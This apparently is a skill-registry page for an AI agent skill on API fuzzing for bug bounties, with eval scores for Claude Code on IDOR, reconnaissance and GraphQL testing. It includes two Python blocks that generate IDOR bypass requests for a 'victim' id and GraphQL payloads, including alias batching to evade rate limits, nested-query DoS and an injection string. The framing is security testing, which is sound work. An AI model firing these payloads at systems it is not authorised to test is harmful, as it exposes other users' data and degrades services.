
api-fuzzing-bug-bounty

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug b...

Install with Tessl CLI

npx tessl i github:sickn33/antigravity-awesome-skills --skill api-fuzzing-bug-bounty

74

Quality: 68% (Does it follow best practices?)

Impact: Pending (No eval scenarios have been run)

Optimize this skill with Tessl:

npx tessl skill review --optimize ./skills/api-fuzzing-bug-bounty/SKILL.md

Evaluation results

IDOR Vulnerability Research Report
Scenario: IDOR bypass techniques
Scenario scores: 100% · 32%

Criteria                                  Without context   With context
Array ID wrap                             100%              100%
JSON nested wrap                          58%               100%
Double parameter pollution                100%              100%
Wildcard injection                        40%               100%
Body parameter pollution                  0%                100%
Email-to-numeric substitution             60%               100%
Self vs direct ID endpoint                25%               100%
Sequential ID increment                   100%              100%
Technique explanations                    100%              100%
Python payload construction               90%               100%

Without context: $0.5093 · 3m 2s · 20 turns · 27 in / 8,774 out tokens
With context: $0.6223 · 2m 46s · 23 turns · 286 in / 9,265 out tokens
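The IDOR bypass techniques named in the criteria above, as an added example that is not part of the skill or of this page: a Python helper that takes one baseline request and emits a request variant per technique (sequential increment, array wrap, JSON nested wrap, double parameter pollution in query and body, wildcard, body parameter pollution, email-to-numeric substitution, self vs direct-ID endpoint). The Request model, the endpoint paths, the ids 1001/1002, the email address and the email parameter name are constructed assumptions for illustration.

```python
import json
import re
from dataclasses import dataclass, field, replace
from typing import Any


@dataclass
class Request:
    """Minimal request model; query is an ordered list so duplicate keys survive (needed for HPP)."""
    method: str
    path: str
    query: list[tuple[str, str]] = field(default_factory=list)
    body: Any = None  # dict (serialised with json.dumps) or a pre-rendered str

    def render(self) -> str:
        qs = "&".join(f"{k}={v}" for k, v in self.query)
        line = f"{self.method} {self.path}" + (f"?{qs}" if qs else "")
        if self.body is None:
            return line
        payload = self.body if isinstance(self.body, str) else json.dumps(self.body)
        return f"{line}\n\n{payload}"


def _in_query(req: Request, key: str) -> bool:
    return any(k == key for k, _ in req.query)


def _body(req: Request) -> dict:
    return dict(req.body) if isinstance(req.body, dict) else {}


def put(req: Request, key: str, value: Any) -> Request:
    """Copy of req with key=value in the query if the key lives there, else in the JSON body."""
    if _in_query(req, key):
        return replace(req, query=[(k, value if k == key else v) for k, v in req.query])
    return replace(req, body={**_body(req), key: value})


def idor_variants(base: Request, param: str, own_id: str, victim_id: str,
                  victim_email=None, email_param: str = "email") -> dict:
    """Map variant name -> Request, one per bypass technique in the eval table above."""
    v = {}

    # Sequential ID increment: swap own id for the victim's, in path and parameter alike.
    direct = put(base, param, victim_id)
    v["sequential"] = replace(direct, path=direct.path.replace(f"/{own_id}", f"/{victim_id}"))
    if victim_id.isdigit():
        v["sequential_next"] = put(base, param, str(int(victim_id) + 1))

    # Array ID wrap: id=[victim] in JSON, id[]=victim in a query string.
    if _in_query(base, param):
        v["array_wrap"] = replace(base, query=[(f"{k}[]", victim_id) if k == param else (k, val)
                                               for k, val in base.query])
    else:
        v["array_wrap"] = put(base, param, [victim_id])

    # JSON nested wrap: {"id": {"id": victim}} slips past naive type or equality checks.
    v["nested_wrap"] = replace(base, body={**_body(base), param: {param: victim_id}})

    # Double parameter pollution: both ids present; authz layer and handler may read different ones.
    others = [(k, val) for k, val in base.query if k != param]
    v["hpp_query"] = replace(base, query=others + [(param, own_id), (param, victim_id)])
    inner = json.dumps({**_body(base), param: own_id})[1:-1]  # duplicate JSON key, built by hand
    v["hpp_body"] = replace(base, body="{" + inner + f", {json.dumps(param)}: {json.dumps(victim_id)}" + "}")

    # Wildcard injection: some ORM and search back ends treat * or % as "match any".
    for w in ("*", "%"):
        v[f"wildcard_{w}"] = put(base, param, w)

    # Body parameter pollution: path/query keep own id, an extra id is smuggled in the body.
    v["body_pollution"] = replace(base, body={**_body(base), param: victim_id})

    # Email-to-numeric substitution: endpoints keyed on email often accept the numeric id too, and vice versa.
    if victim_email:
        v["email_to_numeric"] = put(base, email_param, victim_id)   # email_param name is an assumption
        v["numeric_to_email"] = put(base, param, victim_email)

    # Self vs direct-ID endpoint: /users/me may be guarded while /users/{id} is not.
    self_re = re.compile(r"/(me|self)(?=/|$)")
    if self_re.search(base.path):
        v["self_to_direct"] = replace(base, path=self_re.sub(f"/{victim_id}", base.path))
    return v


if __name__ == "__main__":
    # Constructed baseline: the tester's own request, own id 1001, target id 1002.
    base = Request("GET", "/api/v1/users/me/orders", query=[("user_id", "1001")])
    for name, req in idor_variants(base, "user_id", "1001", "1002", "victim@example.com").items():
        print(f"--- {name}\n{req.render()}")
```

Each variant is sent with the tester's own session; a response that returns the victim's data for any of them is the finding. The duplicate-key body is built as a raw string because json.dumps cannot emit two identical keys, which is precisely the parser-disagreement the technique relies on.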

API Security Assessment Plan: TravelNest Platform
Scenario: API reconnaissance and multi-surface enumeration
Scenario scores: 96% · 20%

Criteria                                  Without context   With context
Swagger/OpenAPI paths                     100%              100%
Kiterunner mention                        0%                100%
API version enumeration                   100%              100%
Mobile API separate testing               100%              100%
No shared security assumption             0%                100%
X-Requested-With header                   100%              100%
Historical endpoint discovery             100%              100%
Auth rate limiting check                  100%              100%
Auth and unauth access                    100%              50%
Auth login paths                          0%                100%
Developer API surface                     100%              100%

Without context: $0.4827 · 2m 56s · 20 turns · 27 in / 8,410 out tokens
With context: $0.7046 · 3m 12s · 27 turns · 290 in / 9,763 out tokens

GraphQL Security Assessment for SocialGraph API
Scenario: GraphQL security testing methodology
Scenario scores: 100% · 8%

Criteria                                  Without context   With context
Introspection query                       100%              100%
Clairvoyance for disabled introspection   100%              100%
GraphQL IDOR payload                      100%              100%
GraphQL injection payload                 100%              100%
Batching rate limit bypass                100%              100%
Nested query DoS                          100%              100%
GraphQL XSS payload                       100%              100%
graphw00f fingerprinting                  0%                100%
GraphCrawler or InQL                      100%              100%
Payload script structure                  100%              100%
Sensitive data fields                     100%              100%

Without context: $0.4824 · 3m 16s · 13 turns · 15 in / 11,219 out tokens
With context: $0.5785 · 2m 59s · 20 turns · 295 in / 9,118 out tokens
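The GraphQL payload criteria above (introspection query, IDOR payload, injection payload, batching for rate-limit bypass, nested-query DoS, sensitive data fields), as an added example that is not the skill's code and not from this page: Python builders for each payload plus the depth check a server would apply. The schema (a user(id: ID!) query with a friends relation and PII fields), the field names and the introspection response sample are constructed assumptions.

```python
import json

# Constructed schema assumptions: user(id: ID!) with a `friends` relation and PII fields.
INTROSPECTION = (
    "query IntrospectionQuery { __schema { queryType { name } mutationType { name } "
    "types { name kind fields { name args { name type { name kind ofType { name kind } } } "
    "type { name kind ofType { name kind } } } } } }"
)

SENSITIVE_FIELDS = ("email", "phone", "ssn", "password", "token", "address")


def idor_query(user_id: str) -> dict:
    """Object-level authz probe: fetch another user's PII by direct id; id travels as a variable."""
    return {"query": "query($id: ID!) { user(id: $id) { id email phone } }",
            "variables": {"id": user_id}}


def alias_batch(user_ids) -> dict:
    """Alias batching: N lookups in one HTTP request, which a per-request rate limit counts once."""
    ids = list(user_ids)
    decl = ", ".join(f"$v{i}: ID!" for i in range(len(ids)))
    body = " ".join(f"u{i}: user(id: $v{i}) {{ id email }}" for i in range(len(ids)))
    return {"query": f"query({decl}) {{ {body} }}",
            "variables": {f"v{i}": u for i, u in enumerate(ids)}}


def array_batch(operations) -> str:
    """JSON-array batching: several operations in a single POST body."""
    return json.dumps(list(operations))


def nested_query(depth: int) -> str:
    """friends { friends { ... } } to `depth` levels; exercises missing depth/complexity limits."""
    inner = "id"
    for _ in range(depth):
        inner = f"friends {{ {inner} }}"
    return f"query($id: ID!) {{ user(id: $id) {{ {inner} }} }}"


def selection_depth(query: str) -> int:
    """Maximum brace nesting of a query: what a server-side depth limit compares against."""
    depth = best = 0
    for ch in query:
        if ch == "{":
            depth += 1
            best = max(best, depth)
        elif ch == "}":
            depth -= 1
    return best


def unsafe_query(name: str) -> str:
    """String-interpolated argument: a quote in `name` rewrites the selection (GraphQL injection)."""
    return f'{{ user(name: "{name}") {{ id }} }}'


def safe_query(name: str) -> dict:
    """Same lookup with the value carried in variables, so it can never become syntax."""
    return {"query": "query($n: String!) { user(name: $n) { id } }", "variables": {"n": name}}


def sensitive_fields(introspection_json: dict) -> list:
    """Scan an introspection response for field names that look like PII or secrets."""
    hits = []
    for t in introspection_json.get("data", {}).get("__schema", {}).get("types", []):
        for f in t.get("fields") or []:
            if any(s in f["name"].lower() for s in SENSITIVE_FIELDS):
                hits.append(f"{t['name']}.{f['name']}")
    return hits


if __name__ == "__main__":
    print(json.dumps(alias_batch(["1001", "1002", "1003"])))
    q = nested_query(20)
    print("depth", selection_depth(q))
    print(unsafe_query('x") { email } #'))
    # Constructed introspection response fragment, as a server might return it.
    sample = {"data": {"__schema": {"types": [
        {"name": "User", "fields": [{"name": "id"}, {"name": "email"}, {"name": "phoneNumber"}]},
        {"name": "Query", "fields": None}]}}}
    print(sensitive_fields(sample))
```

The injection pair is the point to take away: the payload x") { email } # turns the interpolated query into a request for the email field with the original tail commented out, while the variables form delivers the identical bytes as data. selection_depth is the cheap check a defender can apply before execution; a test client can run it on its own payload to confirm what limit it is probing.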

Evaluated with agent Claude Code, model Claude Sonnet 4.6
